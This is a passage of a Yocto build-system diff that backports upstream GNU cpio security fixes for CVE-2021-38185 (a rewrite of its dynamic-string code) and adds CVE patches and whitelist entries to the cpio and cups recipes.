+ descriptor OUT_DES and reset `output_size' and `out_buff'.
+ If `swapping_halfwords' or `swapping_bytes' is set,
+ do the appropriate swapping first. Our callers have
+- to make sure to only set these flags if `output_size'
++ to make sure to only set these flags if `output_size'
+ is appropriate (a multiple of 4 for `swapping_halfwords',
+ 2 for `swapping_bytes'). The fact that DISK_IO_BLOCK_SIZE
+ must always be a multiple of 4 helps us (and our callers)
+@@ -188,8 +188,8 @@ tape_fill_input_buffer (int in_des, int num_bytes)
+ {
+ #ifdef BROKEN_LONG_TAPE_DRIVER
+ /* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+ seek pointer and prevent it from overflowing. */
+ if (input_is_special
+ && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
+@@ -332,8 +332,8 @@ tape_buffered_peek (char *peek_buf, int in_des, int num_bytes)
+
+ #ifdef BROKEN_LONG_TAPE_DRIVER
+ /* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+ seek pointer and prevent it from overflowing. */
+ if (input_is_special
+ && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
+@@ -404,7 +404,7 @@ tape_toss_input (int in_des, off_t num_bytes)
+
+ if (crc_i_flag && only_verify_crc_flag)
+ {
+- int k;
++ int k;
+ for (k = 0; k < space_left; ++k)
+ crc += in_buff[k] & 0xff;
+ }
+@@ -416,14 +416,14 @@ tape_toss_input (int in_des, off_t num_bytes)
+ }
+
+ void
+-write_nuls_to_file (off_t num_bytes, int out_des,
+- void (*writer) (char *in_buf, int out_des, off_t num_bytes))
++write_nuls_to_file (off_t num_bytes, int out_des,
++ void (*writer) (char *in_buf, int out_des, off_t num_bytes))
+ {
+ off_t blocks;
+ off_t extra_bytes;
+ off_t i;
+ static char zeros_512[512];
+-
++
+ blocks = num_bytes / sizeof zeros_512;
+ extra_bytes = num_bytes % sizeof zeros_512;
+ for (i = 0; i < blocks; ++i)
+@@ -603,7 +603,7 @@ create_all_directories (char const *name)
+ char *dir;
+
+ dir = dir_name (name);
+-
++
+ if (dir == NULL)
+ error (PAXEXIT_FAILURE, 0, _("virtual memory exhausted"));
+
+@@ -637,9 +637,9 @@ create_all_directories (char const *name)
+ void
+ prepare_append (int out_file_des)
+ {
+- int start_of_header;
+- int start_of_block;
+- int useful_bytes_in_block;
++ off_t start_of_header;
++ off_t start_of_block;
++ size_t useful_bytes_in_block;
+ char *tmp_buf;
+
+ start_of_header = last_header_start;
+@@ -697,8 +697,8 @@ inode_val_compare (const void *val1, const void *val2)
+ const struct inode_val *ival1 = val1;
+ const struct inode_val *ival2 = val2;
+ return ival1->inode == ival2->inode
+- && ival1->major_num == ival2->major_num
+- && ival1->minor_num == ival2->minor_num;
++ && ival1->major_num == ival2->major_num
++ && ival1->minor_num == ival2->minor_num;
+ }
+
+ static struct inode_val *
+@@ -706,10 +706,10 @@ find_inode_val (ino_t node_num, unsigned long major_num,
+ unsigned long minor_num)
+ {
+ struct inode_val sample;
+-
++
+ if (!hash_table)
+ return NULL;
+-
++
+ sample.inode = node_num;
+ sample.major_num = major_num;
+ sample.minor_num = minor_num;
+@@ -734,7 +734,7 @@ add_inode (ino_t node_num, char *file_name, unsigned long major_num,
+ {
+ struct inode_val *temp;
+ struct inode_val *e = NULL;
+-
++
+ /* Create new inode record. */
+ temp = (struct inode_val *) xmalloc (sizeof (struct inode_val));
+ temp->inode = node_num;
+@@ -1007,7 +1007,7 @@ buf_all_zeros (char *buf, int bufsize)
+
+ /* Write NBYTE bytes from BUF to file descriptor FILDES, trying to
+ create holes instead of writing blockfuls of zeros.
+-
++
+ Return the number of bytes written (including bytes in zero
+ regions) on success, -1 on error.
+
+@@ -1027,7 +1027,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+
+ enum { begin, in_zeros, not_in_zeros } state =
+ delayed_seek_count ? in_zeros : begin;
+-
++
+ while (nbytes)
+ {
+ size_t rest = nbytes;
+@@ -1042,7 +1042,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+ if (state == not_in_zeros)
+ {
+ ssize_t bytes = buf - start_ptr + rest;
+-
++
+ n = write (fildes, start_ptr, bytes);
+ if (n == -1)
+ return -1;
+@@ -1091,8 +1091,8 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+ if (n != 1)
+ return n;
+ delayed_seek_count = 0;
+- }
+-
++ }
++
+ return nwritten + seek_count;
+ }
+
+@@ -1222,7 +1222,7 @@ set_perms (int fd, struct cpio_file_stat *header)
+ if (!no_chown_flag)
+ {
+ uid_t uid = CPIO_UID (header->c_uid);
+- gid_t gid = CPIO_GID (header->c_gid);
++ gid_t gid = CPIO_GID (header->c_gid);
+ if ((fchown_or_chown (fd, header->c_name, uid, gid) < 0)
+ && errno != EPERM)
+ chown_error_details (header->c_name, uid, gid);
+@@ -1239,13 +1239,13 @@ set_file_times (int fd,
+ const char *name, unsigned long atime, unsigned long mtime)
+ {
+ struct timespec ts[2];
+-
++
+ memset (&ts, 0, sizeof ts);
+
+ ts[0].tv_sec = atime;
+ ts[1].tv_sec = mtime;
+
+- /* Silently ignore EROFS because reading the file won't have upset its
++ /* Silently ignore EROFS because reading the file won't have upset its
+ timestamp if it's on a read-only filesystem. */
+ if (fdutimens (fd, name, ts) < 0 && errno != EROFS)
+ utime_error (name);
+@@ -1297,7 +1297,7 @@ cpio_safer_name_suffix (char *name, bool link_target, bool absolute_names,
+
+ /* This is a simplified form of delayed set_stat used by GNU tar.
+ With the time, both forms will merge and pass to paxutils
+-
++
+ List of directories whose statuses we need to extract after we've
+ finished extracting their subsidiary files. If you consider each
+ contiguous subsequence of elements of the form [D]?[^D]*, where [D]
+@@ -1415,7 +1415,7 @@ cpio_mkdir (struct cpio_file_stat *file_hdr, int *setstat_delayed)
+ {
+ int rc;
+ mode_t mode = file_hdr->c_mode;
+-
++
+ if (!(file_hdr->c_mode & S_IWUSR))
+ {
+ rc = mkdir (file_hdr->c_name, mode | S_IWUSR);
+@@ -1438,10 +1438,10 @@ cpio_create_dir (struct cpio_file_stat *file_hdr, int existing_dir)
+ {
+ int res; /* Result of various function calls. */
+ int setstat_delayed = 0;
+-
++
+ if (to_stdout_option)
+ return 0;
+-
++
+ /* Strip any trailing `/'s off the filename; tar puts
+ them on. We might as well do it here in case anybody
+ else does too, since they cause strange things to happen. */
+@@ -1530,7 +1530,7 @@ arf_stores_inode_p (enum archive_format arf)
+ }
+ return 1;
+ }
+-
++
+ void
+ cpio_file_stat_init (struct cpio_file_stat *file_hdr)
+ {
+--
+2.39.2
+
diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
new file mode 100644
index 0000000000..6ceafeee49
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
@@ -0,0 +1,581 @@
+GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted
+pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers
+an out-of-bounds heap write.
+
+CVE: CVE-2021-38185
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 7 Aug 2021 12:52:21 +0300
+Subject: [PATCH 1/3] Rewrite dynamic string support.
+
+* src/dstring.c (ds_init): Take a single argument.
+(ds_free): New function.
+(ds_resize): Take a single argument. Use x2nrealloc to expand
+the storage.
+(ds_reset,ds_append,ds_concat,ds_endswith): New function.
+(ds_fgetstr): Rewrite. In particular, this fixes integer overflow.
+* src/dstring.h (dynamic_string): Keep both the allocated length
+(ds_size) and index of the next free byte in the string (ds_idx).
+(ds_init,ds_resize): Change signature.
+(ds_len): New macro.
+(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos.
+* src/copyin.c: Use new ds_ functions.
+* src/copyout.c: Likewise.
+* src/copypass.c: Likewise.
+* src/util.c: Likewise.
+---
+ src/copyin.c | 40 +++++++++++------------
+ src/copyout.c | 16 ++++-----
+ src/copypass.c | 34 +++++++++----------
+ src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++--------------
+ src/dstring.h | 31 +++++++++---------
+ src/util.c | 6 ++--
+ 6 files changed, 123 insertions(+), 92 deletions(-)
+
+diff --git a/src/copyin.c b/src/copyin.c
+index b29f348..37e503a 100644
+--- a/src/copyin.c
++++ b/src/copyin.c
+@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out,
+ char *str_res; /* Result for string function. */
+ static dynamic_string new_name; /* New file name for rename option. */
+ static int initialized_new_name = false;
++
+ if (!initialized_new_name)
+- {
+- ds_init (&new_name, 128);
+- initialized_new_name = true;
+- }
++ {
++ ds_init (&new_name);
++ initialized_new_name = true;
++ }
+
+ if (rename_flag)
+ {
+@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name)
+ already in `save_patterns' (from the command line) are preserved. */
+
+ static void
+-read_pattern_file ()
++read_pattern_file (void)
+ {
+- int max_new_patterns;
+- char **new_save_patterns;
+- int new_num_patterns;
++ char **new_save_patterns = NULL;
++ size_t max_new_patterns;
++ size_t new_num_patterns;
+ int i;
+- dynamic_string pattern_name;
++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER;
+ FILE *pattern_fp;
+
+ if (num_patterns < 0)
+ num_patterns = 0;
+- max_new_patterns = 1 + num_patterns;
+- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *));
+ new_num_patterns = num_patterns;
+- ds_init (&pattern_name, 128);
++ max_new_patterns = num_patterns;
++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0]));
+
+ pattern_fp = fopen (pattern_file_name, "r");
+ if (pattern_fp == NULL)
+ open_fatal (pattern_file_name);
+ while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL)
+ {
+- if (new_num_patterns >= max_new_patterns)
+- {
+- max_new_patterns += 1;
+- new_save_patterns = (char **)
+- xrealloc ((char *) new_save_patterns,
+- max_new_patterns * sizeof (char *));
+- }
++ if (new_num_patterns == max_new_patterns)
++ new_save_patterns = x2nrealloc (new_save_patterns,
++ &max_new_patterns,
++ sizeof (new_save_patterns[0]));
+ new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string);
+ ++new_num_patterns;
+ }
++
++ ds_free (&pattern_name);
++
+ if (ferror (pattern_fp) || fclose (pattern_fp) == EOF)
+ close_error (pattern_file_name);
+
+@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count)
+ in the file system. */
+
+ void
+-process_copy_in ()
++process_copy_in (void)
+ {
+ char done = false; /* True if trailer reached. */
+ FILE *tty_in = NULL; /* Interactive file for rename option. */
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..26e3dda 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value)
+ The format of the header depends on the compatibility (-c) flag. */
+
+ void
+-process_copy_out ()
++process_copy_out (void)
+ {
+- dynamic_string input_name; /* Name of file read from stdin. */
++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of file read from stdin. */
+ struct stat file_stat; /* Stat record for file. */
+ struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER;
+ /* Output header information. */
+@@ -605,7 +606,6 @@ process_copy_out ()
+ char *orig_file_name = NULL;
+
+ /* Initialize the copy out. */
+- ds_init (&input_name, 128);
+ file_hdr.c_magic = 070707;
+
+ /* Check whether the output file might be a tape. */
+@@ -657,14 +657,9 @@ process_copy_out ()
+ {
+ if (file_hdr.c_mode & CP_IFDIR)
+ {
+- int len = strlen (input_name.ds_string);
+ /* Make sure the name ends with a slash */
+- if (input_name.ds_string[len-1] != '/')
+- {
+- ds_resize (&input_name, len + 2);
+- input_name.ds_string[len] = '/';
+- input_name.ds_string[len+1] = 0;
+- }
++ if (!ds_endswith (&input_name, '/'))
++ ds_append (&input_name, '/');
+ }
+ }
+
+@@ -875,6 +870,7 @@ process_copy_out ()
+ (unsigned long) blocks), (unsigned long) blocks);
+ }
+ cpio_file_stat_free (&file_hdr);
++ ds_free (&input_name);
+ }
+
+
+diff --git a/src/copypass.c b/src/copypass.c
+index dc13b5b..62f31c6 100644
+--- a/src/copypass.c
++++ b/src/copypass.c
+@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st)
+ If `link_flag', link instead of copying. */
+
+ void
+-process_copy_pass ()
++process_copy_pass (void)
+ {
+- dynamic_string input_name; /* Name of file from stdin. */
+- dynamic_string output_name; /* Name of new file. */
++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of file from stdin. */
++ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of new file. */
+ size_t dirname_len; /* Length of `directory_name'. */
+ int res; /* Result of functions. */
+ char *slash; /* For moving past slashes in input name. */
+@@ -65,25 +67,18 @@ process_copy_pass ()
+ created files */
+
+ /* Initialize the copy pass. */
+- ds_init (&input_name, 128);
+
+ dirname_len = strlen (directory_name);
+ if (change_directory_option && !ISSLASH (directory_name[0]))
+ {
+ char *pwd = xgetcwd ();
+-
+- dirname_len += strlen (pwd) + 1;
+- ds_init (&output_name, dirname_len + 2);
+- strcpy (output_name.ds_string, pwd);
+- strcat (output_name.ds_string, "/");
+- strcat (output_name.ds_string, directory_name);
++
++ ds_concat (&output_name, pwd);
++ ds_append (&output_name, '/');
+ }
+- else
+- {
+- ds_init (&output_name, dirname_len + 2);
+- strcpy (output_name.ds_string, directory_name);
+- }
+- output_name.ds_string[dirname_len] = '/';
++ ds_concat (&output_name, directory_name);
++ ds_append (&output_name, '/');
++ dirname_len = ds_len (&output_name);
+ output_is_seekable = true;
+
+ change_dir ();
+@@ -116,8 +111,8 @@ process_copy_pass ()
+ /* Make the name of the new file. */
+ for (slash = input_name.ds_string; *slash == '/'; ++slash)
+ ;
+- ds_resize (&output_name, dirname_len + strlen (slash) + 2);
+- strcpy (output_name.ds_string + dirname_len + 1, slash);
++ ds_reset (&output_name, dirname_len);
++ ds_concat (&output_name, slash);
+
+ existing_dir = false;
+ if (lstat (output_name.ds_string, &out_file_stat) == 0)
+@@ -333,6 +328,9 @@ process_copy_pass ()
+ (unsigned long) blocks),
+ (unsigned long) blocks);
+ }
++
++ ds_free (&input_name);
++ ds_free (&output_name);
+ }
+
+ /* Try and create a hard link from FILE_NAME to another file
+diff --git a/src/dstring.c b/src/dstring.c
+index e9c063f..358f356 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -20,8 +20,8 @@
+ #if defined(HAVE_CONFIG_H)
+ # include <config.h>
+ #endif
+-
+ #include <stdio.h>
++#include <stdlib.h>
+ #if defined(HAVE_STRING_H) || defined(STDC_HEADERS)
+ #include <string.h>
+ #else
+@@ -33,24 +33,41 @@
+ /* Initialiaze dynamic string STRING with space for SIZE characters. */
+
+ void
+-ds_init (dynamic_string *string, int size)
++ds_init (dynamic_string *string)
++{
++ memset (string, 0, sizeof *string);
++}
++
++/* Free the dynamic string storage. */
++
++void
++ds_free (dynamic_string *string)
+ {
+- string->ds_length = size;
+- string->ds_string = (char *) xmalloc (size);
++ free (string->ds_string);
+ }
+
+-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */
++/* Expand dynamic string STRING, if necessary. */
+
+ void
+-ds_resize (dynamic_string *string, int size)
++ds_resize (dynamic_string *string)
+ {
+- if (size > string->ds_length)
++ if (string->ds_idx == string->ds_size)
+ {
+- string->ds_length = size;
+- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size);
++ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
++ 1);
+ }
+ }
+
++/* Reset the index of the dynamic string S to LEN. */
++
++void
++ds_reset (dynamic_string *s, size_t len)
++{
++ while (len > s->ds_size)
++ ds_resize (s);
++ s->ds_idx = len;
++}
++
+ /* Dynamic string S gets a string terminated by the EOS character
+ (which is removed) from file F. S will increase
+ in size during the function if the string from F is longer than
+@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size)
+ char *
+ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ {
+- int insize; /* Amount needed for line. */
+- int strsize; /* Amount allocated for S. */
+ int next_ch;
+
+ /* Initialize. */
+- insize = 0;
+- strsize = s->ds_length;
++ s->ds_idx = 0;
+
+ /* Read the input string. */
+- next_ch = getc (f);
+- while (next_ch != eos && next_ch != EOF)
++ while ((next_ch = getc (f)) != eos && next_ch != EOF)
+ {
+- if (insize >= strsize - 1)
+- {
+- ds_resize (s, strsize * 2 + 2);
+- strsize = s->ds_length;
+- }
+- s->ds_string[insize++] = next_ch;
+- next_ch = getc (f);
++ ds_resize (s);
++ s->ds_string[s->ds_idx++] = next_ch;
+ }
+- s->ds_string[insize++] = '\0';
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = '\0';
+
+- if (insize == 1 && next_ch == EOF)
++ if (s->ds_idx == 0 && next_ch == EOF)
+ return NULL;
+ else
+ return s->ds_string;
+ }
+
++void
++ds_append (dynamic_string *s, int c)
++{
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = c;
++ if (c)
++ {
++ s->ds_idx++;
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = 0;
++ }
++}
++
++void
++ds_concat (dynamic_string *s, char const *str)
++{
++ size_t len = strlen (str);
++ while (len + 1 > s->ds_size)
++ ds_resize (s);
++ memcpy (s->ds_string + s->ds_idx, str, len);
++ s->ds_idx += len;
++ s->ds_string[s->ds_idx] = 0;
++}
++
+ char *
+ ds_fgets (FILE *f, dynamic_string *s)
+ {
+@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s)
+ {
+ return ds_fgetstr (f, s, '\0');
+ }
++
++/* Return true if the dynamic string S ends with character C. */
++int
++ds_endswith (dynamic_string *s, int c)
++{
++ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c);
++}
+diff --git a/src/dstring.h b/src/dstring.h
+index b5135fe..f5b04ef 100644
+--- a/src/dstring.h
++++ b/src/dstring.h
+@@ -17,10 +17,6 @@
+ Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
+ Boston, MA 02110-1301 USA. */
+
+-#ifndef NULL
+-#define NULL 0
+-#endif
+-
+ /* A dynamic string consists of record that records the size of an
+ allocated string and the pointer to that string. The actual string
+ is a normal zero byte terminated string that can be used with the
+@@ -30,22 +26,25 @@
+
+ typedef struct
+ {
+- int ds_length; /* Actual amount of storage allocated. */
+- char *ds_string; /* String. */
++ size_t ds_size; /* Actual amount of storage allocated. */
++ size_t ds_idx; /* Index of the next free byte in the string. */
++ char *ds_string; /* String storage. */
+ } dynamic_string;
+
++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL }
+
+-/* Macros that look similar to the original string functions.
+- WARNING: These macros work only on pointers to dynamic string records.
+- If used with a real record, an "&" must be used to get the pointer. */
+-#define ds_strlen(s) strlen ((s)->ds_string)
+-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string)
+-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n)
+-#define ds_index(s, c) index ((s)->ds_string, c)
+-#define ds_rindex(s, c) rindex ((s)->ds_string, c)
++void ds_init (dynamic_string *string);
++void ds_free (dynamic_string *string);
++void ds_reset (dynamic_string *s, size_t len);
+
+-void ds_init (dynamic_string *string, int size);
+-void ds_resize (dynamic_string *string, int size);
++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */
+ char *ds_fgetname (FILE *f, dynamic_string *s);
+ char *ds_fgets (FILE *f, dynamic_string *s);
+ char *ds_fgetstr (FILE *f, dynamic_string *s, char eos);
++void ds_append (dynamic_string *s, int c);
++void ds_concat (dynamic_string *s, char const *str);
++
++#define ds_len(s) ((s)->ds_idx)
++
++int ds_endswith (dynamic_string *s, int c);
++
+diff --git a/src/util.c b/src/util.c
+index 4421b20..6d6bbaa 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -846,11 +846,9 @@ get_next_reel (int tape_des)
+ FILE *tty_out; /* File for interacting with user. */
+ int old_tape_des;
+ char *next_archive_name;
+- dynamic_string new_name;
++ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER;
+ char *str_res;
+
+- ds_init (&new_name, 128);
+-
+ /* Open files for interactive communication. */
+ tty_in = fopen (TTY_NAME, "r");
+ if (tty_in == NULL)
+@@ -925,7 +923,7 @@ get_next_reel (int tape_des)
+ error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"),
+ old_tape_des, tape_des);
+
+- free (new_name.ds_string);
++ ds_free (&new_name);
+ fclose (tty_in);
+ fclose (tty_out);
+ }
+--
+2.25.1
+
+
+From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 11 Aug 2021 18:10:38 +0300
+Subject: [PATCH 2/3] Fix previous commit
+
+* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a
+loop.
+---
+ src/dstring.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 358f356..90c691c 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -64,7 +64,7 @@ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+ while (len > s->ds_size)
+- ds_resize (s);
++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+ s->ds_idx = len;
+ }
+
+@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str)
+ {
+ size_t len = strlen (str);
+ while (len + 1 > s->ds_size)
+- ds_resize (s);
++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+ memcpy (s->ds_string + s->ds_idx, str, len);
+ s->ds_idx += len;
+ s->ds_string[s->ds_idx] = 0;
+--
+2.25.1
+
+
+From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 18 Aug 2021 09:41:39 +0300
+Subject: [PATCH 3/3] Fix dynamic string reallocations
+
+* src/dstring.c (ds_resize): Take additional argument: number of
+bytes to leave available after ds_idx. All uses changed.
+---
+ src/dstring.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 90c691c..0f597cc 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -49,9 +49,9 @@ ds_free (dynamic_string *string)
+ /* Expand dynamic string STRING, if necessary. */
+
+ void
+-ds_resize (dynamic_string *string)
++ds_resize (dynamic_string *string, size_t len)
+ {
+- if (string->ds_idx == string->ds_size)
++ while (len + string->ds_idx >= string->ds_size)
+ {
+ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
+ 1);
+@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string)
+ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+- while (len > s->ds_size)
+- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++ ds_resize (s, len);
+ s->ds_idx = len;
+ }
+
+@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ /* Read the input string. */
+ while ((next_ch = getc (f)) != eos && next_ch != EOF)
+ {
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx++] = next_ch;
+ }
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = '\0';
+
+ if (s->ds_idx == 0 && next_ch == EOF)
+@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ void
+ ds_append (dynamic_string *s, int c)
+ {
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = c;
+ if (c)
+ {
+ s->ds_idx++;
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = 0;
+ }
+ }
+@@ -115,8 +114,7 @@ void
+ ds_concat (dynamic_string *s, char const *str)
+ {
+ size_t len = strlen (str);
+- while (len + 1 > s->ds_size)
+- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++ ds_resize (s, len);
+ memcpy (s->ds_string + s->ds_idx, str, len);
+ s->ds_idx += len;
+ s->ds_string[s->ds_idx] = 0;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb
index 9e35a80f8b..5ab567f360 100644
--- a/meta/recipes-extended/cpio/cpio_2.13.bb
+++ b/meta/recipes-extended/cpio/cpio_2.13.bb
@@ -9,6 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949"
SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \
file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \
+ file://CVE-2021-38185.patch \
+ file://0003-Fix-calculation-of-CRC-in-copy-out-mode.patch \
+ file://0004-Fix-appending-to-archives-bigger-than-2G.patch \
"
SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810"
@@ -16,6 +19,9 @@ SRC_URI[sha256sum] = "e87470d9c984317f658567c03bfefb6b0c829ff17dbf6b0de48d71a4c8
inherit autotools gettext texinfo
+# Issue applies to use of cpio in SUSE/OBS, doesn't apply to us
+CVE_CHECK_WHITELIST += "CVE-2010-4226"
+
EXTRA_OECONF += "DEFAULT_RMT_DIR=${sbindir}"
do_install () {
diff --git a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
index 82995219dc..9cdb71f1a1 100644
--- a/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
+++ b/meta/recipes-extended/cracklib/cracklib_2.9.5.bb
@@ -1,5 +1,6 @@
SUMMARY = "Password strength checker library"
-HOMEPAGE = "http://sourceforge.net/projects/cracklib"
+HOMEPAGE = "https://github.com/cracklib/cracklib"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=e3eda01d9815f8d24aae2dbd89b68b06"
diff --git a/meta/recipes-extended/cups/cups.inc b/meta/recipes-extended/cups/cups.inc
index c5a60bde12..6cfe314f20 100644
--- a/meta/recipes-extended/cups/cups.inc
+++ b/meta/recipes-extended/cups/cups.inc
@@ -13,11 +13,23 @@ SRC_URI = "https://github.com/apple/cups/releases/download/v${PV}/${BP}-source.t
file://0002-don-t-try-to-run-generated-binaries.patch \
file://0003-cups_1.4.6.bb-Fix-build-on-ppc64.patch \
file://0004-cups-fix-multilib-install-file-conflicts.patch\
+ file://CVE-2022-26691.patch \
+ file://CVE-2023-32324.patch \
+ file://CVE-2023-34241.patch \
+ file://CVE-2023-32360.patch \
+ file://CVE-2023-4504.patch \
"
UPSTREAM_CHECK_URI = "https://github.com/apple/cups/releases"
UPSTREAM_CHECK_REGEX = "cups-(?P<pver>\d+\.\d+(\.\d+)?)-source.tar"
+# Issue only applies to MacOS
+CVE_CHECK_WHITELIST += "CVE-2008-1033"
+# Issue affects pdfdistiller plugin used with but not part of cups
+CVE_CHECK_WHITELIST += "CVE-2009-0032"
+# This is an Ubuntu only issue.
+CVE_CHECK_WHITELIST += "CVE-2018-6553"
+
LEAD_SONAME = "libcupsdriver.so"
CLEANBROKEN = "1"
@@ -34,7 +46,7 @@ PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'zeroconf', 'avahi',
PACKAGECONFIG[avahi] = "--enable-avahi,--disable-avahi,avahi"
PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl"
PACKAGECONFIG[pam] = "--enable-pam --with-pam-module=unix, --disable-pam, libpam"
-PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--without-systemd,systemd"
+PACKAGECONFIG[systemd] = "--with-systemd=${systemd_system_unitdir},--disable-systemd,systemd"
PACKAGECONFIG[xinetd] = "--with-xinetd=${sysconfdir}/xinetd.d,--without-xinetd,xinetd"
EXTRA_OECONF = " \
@@ -45,6 +57,9 @@ EXTRA_OECONF = " \
--enable-debug \
--disable-relro \
--enable-libusb \
+ --with-system-groups=lpadmin \
+ --with-cups-group=lp \
+ --with-domainsocket=/run/cups/cups.sock \
DSOFLAGS='${LDFLAGS}' \
"
@@ -106,3 +121,7 @@ SYSROOT_PREPROCESS_FUNCS += "cups_sysroot_preprocess"
cups_sysroot_preprocess () {
sed -i ${SYSROOT_DESTDIR}${bindir_crossscripts}/cups-config -e 's:cups_datadir=.*:cups_datadir=${datadir}/cups:' -e 's:cups_serverbin=.*:cups_serverbin=${libexecdir}/cups:'
}
+
+# -25317 concerns /var/log/cups having lp ownership. Our /var/log/cups is
+# root:root, so this doesn't apply.
+CVE_CHECK_WHITELIST += "CVE-2021-25317"
